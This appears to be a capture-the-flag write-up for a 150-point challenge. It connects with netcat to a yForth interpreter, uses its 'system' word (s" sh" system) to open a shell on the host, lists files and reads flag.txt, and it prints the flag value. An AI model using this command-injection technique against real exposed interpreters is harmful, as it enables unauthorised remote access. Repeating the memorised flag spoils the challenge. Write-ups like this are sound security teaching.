Remote code execution with a code injection vulnerability in a Forth interpreter.

Challenge Description

Points

150

Description

Connect to 136.243.194.49:1024 and get a shell.

Solution

When we connect to the IP address given, we are greeted by a Forth interpreter.

$ nc 136.243.194.49 1024
yForth? v0.2  Copyright (C) 2012  Luca Padovani
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions; see LICENSE for details.
ls
[ls] error(2): unknown word.
1 .
1 ok

yForth exposes a 'system' word that passes a string (here built with s") to the shell, so an unauthenticated client can run arbitrary commands and get a shell pretty easily:

$ nc 136.243.194.49 1024
yForth? v0.2  Copyright (C) 2012  Luca Padovani
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions; see LICENSE for details.
s" sh" system
sh: 0: can't access tty; job control turned off
$

From here, we explore the file system and read the flag:

$ ls -la
total 120
drwxr-xr-x 2 root root  4096 Dec 27 18:26 .
drwxr-xr-x 3 root root  4096 Dec 23 18:06 ..
-rw-r--r-- 1 root root   220 Dec 23 18:06 .bash_logout
-rw-r--r-- 1 root root  3771 Dec 23 18:06 .bashrc
-rw-r--r-- 1 root root    38 Dec 26 22:48 flag.txt
-rw-r--r-- 1 root root   675 Dec 23 18:06 .profile
-rw-r--r-- 1 root root  2474 Dec 26 22:27 README.gpl
-rwxr-xr-x 1 root root    84 Dec 27 18:11 run.sh
-rwxr-xr-x 1 root root 86512 Dec 26 22:27 yforth
$ cat flag.txt
32C3_a8cfc6174adcb39b8d6dc361e888f17b
$

Flag: 32C3_a8cfc6174adcb39b8d6dc361e888f17b
